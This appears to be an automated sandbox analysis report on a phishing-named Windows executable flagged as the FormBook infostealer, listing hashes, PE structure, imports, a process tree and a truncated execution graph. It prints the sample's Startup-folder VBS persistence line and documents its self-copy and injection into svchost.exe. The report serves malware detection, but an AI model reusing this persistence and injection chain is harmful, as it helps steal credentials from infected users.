                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.V.e.v.i.n.a.\.d.e.b.l.a.t.e.r.a.t.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.147575666685172
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:confirm bank details invoice.exe
                  File size:1'214'464 bytes
                  MD5:aac8fccdea2f379bb5c27edf267427fd
                  SHA1:e193c96e5d20e5f296fc8bf84145bfdbe8ce1cfc
                  SHA256:2faacf34e9482cbf4d1b032af7193b4c1ecd419da8377d47e1a307f17b77bc27
                  SHA512:e75a3c3807988dbf2de5bf9fdf2787c91e2cb1190d3db3fe1d857d611085f14271f830053b7ea0ec3a7f6160debd69eebb501d385724b1ce3ea0e7a84c216af2
                  SSDEEP:24576:Ltb20pkaCqT5TBWgNQ7aw5d1UaOV9VOuO6YJ4xdO6A:IVg5tQ7awT1UasVOlk+5
                  TLSH:9145D01373DE8361C3725273BA26B741AEBF782506A1F56B2FD4093DF920122525EA73
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                  File Icon

                  Icon Hash:aaf3e3e3938382a0

                  Static PE Info

                  General

                  Entrypoint:0x425f74
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x673EC966 [Thu Nov 21 05:47:18 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:3d95adbf13bbe79dc24dccb401c12091

                  Entrypoint Preview

                  Instruction
                  call 00007F0A048C4DCFh
                  jmp 00007F0A048B7DE4h
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007F0A048B7F6Ah
                  cmp edi, eax
                  jc 00007F0A048B82CEh
                  bt dword ptr [004C0158h], 01h
                  jnc 00007F0A048B7F69h
                  rep movsb
                  jmp 00007F0A048B827Ch
                  cmp ecx, 00000080h
                  jc 00007F0A048B8134h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007F0A048B7F70h
                  bt dword ptr [004BA370h], 01h
                  jc 00007F0A048B8440h
                  bt dword ptr [004C0158h], 00000000h
                  jnc 00007F0A048B810Dh
                  test edi, 00000003h
                  jne 00007F0A048B811Eh
                  test esi, 00000003h
                  jne 00007F0A048B80FDh
                  bt edi, 02h
                  jnc 00007F0A048B7F6Fh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007F0A048B7F73h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007F0A048B7FC5h
                  bt esi, 03h
                  jnc 00007F0A048B8018h
                  movdqa xmm1, dqword ptr [esi+00h]

                  Rich Headers

                  Programming Language:
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2012 UPD4 build 61030
                  • [RES] VS2012 UPD4 build 61030
                  • [LNK] VS2012 UPD4 build 61030

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f65c.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0xc40000x5f65c0x5f800871e5a97bb35e875950ee4fca1d66204False0.930628272251309data7.901744471637124IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x1240000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                  RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                  RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                  RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                  RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                  RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                  RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                  RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                  RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                  RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                  RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                  RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                  RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                  RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                  RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                  RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                  RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                  RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                  RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                  RT_RCDATA0xcc7b80x56961data1.0003270765838543
                  RT_GROUP_ICON0x12311c0x76dataEnglishGreat Britain0.6610169491525424
                  RT_GROUP_ICON0x1231940x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x1231a80x14dataEnglishGreat Britain1.15
                  RT_GROUP_ICON0x1231bc0x14dataEnglishGreat Britain1.25
                  RT_VERSION0x1231d00xdcdataEnglishGreat Britain0.6181818181818182
                  RT_MANIFEST0x1232ac0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                  Imports

                  DLLImport
                  WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                  PSAPI.DLLGetProcessMemoryInfo
                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dllIsThemeActive
                  KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishGreat Britain

                  Network Behavior

                  No network behavior found

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:06:19:10
                  Start date:21/11/2024
                  Path:C:\Users\user\Desktop\confirm bank details invoice.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\confirm bank details invoice.exe"
                  Imagebase:0x470000
                  File size:1'214'464 bytes
                  MD5 hash:AAC8FCCDEA2F379BB5C27EDF267427FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:06:19:12
                  Start date:21/11/2024
                  Path:C:\Users\user\AppData\Local\Vevina\deblaterate.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\confirm bank details invoice.exe"
                  Imagebase:0xd20000
                  File size:1'214'464 bytes
                  MD5 hash:AAC8FCCDEA2F379BB5C27EDF267427FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 34%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:3
                  Start time:06:19:14
                  Start date:21/11/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\confirm bank details invoice.exe"
                  Imagebase:0x1000000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:4
                  Start time:06:19:24
                  Start date:21/11/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"
                  Imagebase:0x7ff632d60000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:5
                  Start time:06:19:25
                  Start date:21/11/2024
                  Path:C:\Users\user\AppData\Local\Vevina\deblaterate.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
                  Imagebase:0xd20000
                  File size:1'214'464 bytes
                  MD5 hash:AAC8FCCDEA2F379BB5C27EDF267427FD
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:7
                  Start time:06:19:27
                  Start date:21/11/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Vevina\deblaterate.exe"
                  Imagebase:0x1000000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:3.7%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:9.1%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:58
                    execution_graph 93185 4e9bec 93221 480ae0 _memcpy_s Mailbox 93185->93221 93187 48f4ea 48 API calls 93187->93221 93188 481526 Mailbox 93365 4bcc5c 86 API calls 4 library calls 93188->93365 93191 48f4ea 48 API calls 93217 47fec8 93191->93217 93192 480509 93368 4bcc5c 86 API calls 4 library calls 93192->93368 93193 48146e 93201 476eed 48 API calls 93193->93201 93196 481473 93367 4bcc5c 86 API calls 4 library calls 93196->93367 93198 476eed 48 API calls 93198->93217 93199 4ea246 93359 476eed 93199->93359 93200 4ea922 93216 47ffe1 Mailbox 93201->93216 93206 4ea873 93207 47d7f7 48 API calls 93207->93217 93208 4ea30e 93208->93216 93363 4a97ed InterlockedDecrement 93208->93363 93210 490f0a 52 API calls __cinit 93210->93217 93212 4a97ed InterlockedDecrement 93212->93217 93213 4ea973 93369 4bcc5c 86 API calls 4 library calls 93213->93369 93215 4ea982 93217->93191 93217->93192 93217->93193 93217->93196 93217->93198 93217->93199 93217->93207 93217->93208 93217->93210 93217->93212 93217->93213 93217->93216 93218 4815b5 93217->93218 93356 481820 335 API calls 2 library calls 93217->93356 93357 481d10 59 API calls Mailbox 93217->93357 93366 4bcc5c 86 API calls 4 library calls 93218->93366 93221->93187 93221->93188 93221->93216 93221->93217 93222 4ea706 93221->93222 93224 4a97ed InterlockedDecrement 93221->93224 93228 47fe30 93221->93228 93257 4c6ff0 93221->93257 93266 4d0d09 93221->93266 93269 4d0d1d 93221->93269 93272 4cf0ac 93221->93272 93304 4ba6ef 93221->93304 93310 47ce19 93221->93310 93316 4ce822 93221->93316 93358 4cef61 82 API calls 2 library calls 93221->93358 93364 4bcc5c 86 API calls 4 library calls 93222->93364 93224->93221 93229 47fe50 93228->93229 93255 47fe7e 93228->93255 93370 48f4ea 93229->93370 93231 490f0a 52 API calls __cinit 93231->93255 93232 48146e 93233 476eed 48 API calls 93232->93233 93254 47ffe1 93233->93254 93234 4815b5 93382 4bcc5c 86 API calls 4 library calls 93234->93382 93235 480509 93384 4bcc5c 86 API calls 4 library calls 93235->93384 93239 48f4ea 48 API calls 93239->93255 93240 481473 93383 4bcc5c 86 API calls 4 library calls 93240->93383 93241 4ea246 93243 476eed 48 API calls 93241->93243 93242 4ea922 93242->93221 93243->93254 93246 476eed 48 API calls 93246->93255 93247 4ea873 93247->93221 93248 47d7f7 48 API calls 93248->93255 93249 4ea30e 93249->93254 93381 4a97ed InterlockedDecrement 93249->93381 93251 4a97ed InterlockedDecrement 93251->93255 93252 4ea973 93385 4bcc5c 86 API calls 4 library calls 93252->93385 93254->93221 93255->93231 93255->93232 93255->93234 93255->93235 93255->93239 93255->93240 93255->93241 93255->93246 93255->93248 93255->93249 93255->93251 93255->93252 93255->93254 93379 481820 335 API calls 2 library calls 93255->93379 93380 481d10 59 API calls Mailbox 93255->93380 93256 4ea982 93408 47936c 93257->93408 93259 4c702a 93428 47b470 93259->93428 93261 4c703a 93262 47fe30 335 API calls 93261->93262 93263 4c705f 93261->93263 93262->93263 93265 4c7063 93263->93265 93456 47cdb9 48 API calls 93263->93456 93265->93221 93511 4cf8ae 93266->93511 93268 4d0d19 93268->93221 93270 4cf8ae 129 API calls 93269->93270 93271 4d0d2d 93270->93271 93271->93221 93273 47d7f7 48 API calls 93272->93273 93274 4cf0c0 93273->93274 93275 47d7f7 48 API calls 93274->93275 93276 4cf0c8 93275->93276 93277 47d7f7 48 API calls 93276->93277 93278 4cf0d0 93277->93278 93279 47936c 81 API calls 93278->93279 93292 4cf0de 93279->93292 93280 476a63 48 API calls 93280->93292 93281 4cf2cc 93282 4cf2f9 Mailbox 93281->93282 93689 476b68 48 API calls 93281->93689 93282->93221 93284 4cf2b3 93670 47518c 93284->93670 93285 4cf2ce 93290 47518c 48 API calls 93285->93290 93286 476eed 48 API calls 93286->93292 93289 47c799 48 API calls 93289->93292 93291 4cf2dd 93290->93291 93295 47510d 48 API calls 93291->93295 93292->93280 93292->93281 93292->93282 93292->93284 93292->93285 93292->93286 93292->93289 93293 47bdfa 48 API calls 93292->93293 93296 47bdfa 48 API calls 93292->93296 93301 47518c 48 API calls 93292->93301 93302 47936c 81 API calls 93292->93302 93303 47510d 48 API calls 93292->93303 93297 4cf175 CharUpperBuffW 93293->93297 93295->93281 93298 4cf23a CharUpperBuffW 93296->93298 93659 47d645 93297->93659 93669 48d922 55 API calls 2 library calls 93298->93669 93301->93292 93302->93292 93303->93292 93305 4ba6fb 93304->93305 93306 48f4ea 48 API calls 93305->93306 93307 4ba709 93306->93307 93308 4ba717 93307->93308 93309 47d7f7 48 API calls 93307->93309 93308->93221 93309->93308 93311 47ce28 __NMSG_WRITE 93310->93311 93312 48ee75 48 API calls 93311->93312 93313 47ce50 _memcpy_s 93312->93313 93314 48f4ea 48 API calls 93313->93314 93315 47ce66 93314->93315 93315->93221 93317 4ce84e 93316->93317 93318 4ce868 93316->93318 93713 4bcc5c 86 API calls 4 library calls 93317->93713 93714 4cccdc 48 API calls 93318->93714 93321 4ce871 93322 47fe30 334 API calls 93321->93322 93323 4ce8cf 93322->93323 93324 4ce96a 93323->93324 93325 4ce916 93323->93325 93349 4ce860 Mailbox 93323->93349 93327 4ce9c7 93324->93327 93328 4ce978 93324->93328 93715 4b9b72 48 API calls 93325->93715 93332 47936c 81 API calls 93327->93332 93327->93349 93733 4ba69d 48 API calls 93328->93733 93329 4ce949 93716 4845e0 93329->93716 93334 4ce9e1 93332->93334 93333 4ce99b 93734 47bc74 48 API calls 93333->93734 93336 47bdfa 48 API calls 93334->93336 93338 4cea05 CharUpperBuffW 93336->93338 93337 4ce9a3 Mailbox 93735 483200 93337->93735 93340 4cea1f 93338->93340 93341 4cea26 93340->93341 93342 4cea72 93340->93342 93808 4b9b72 48 API calls 93341->93808 93343 47936c 81 API calls 93342->93343 93344 4cea7a 93343->93344 93809 471caa 49 API calls 93344->93809 93347 4cea54 93348 4845e0 334 API calls 93347->93348 93348->93349 93349->93221 93350 4cea84 93350->93349 93351 47936c 81 API calls 93350->93351 93352 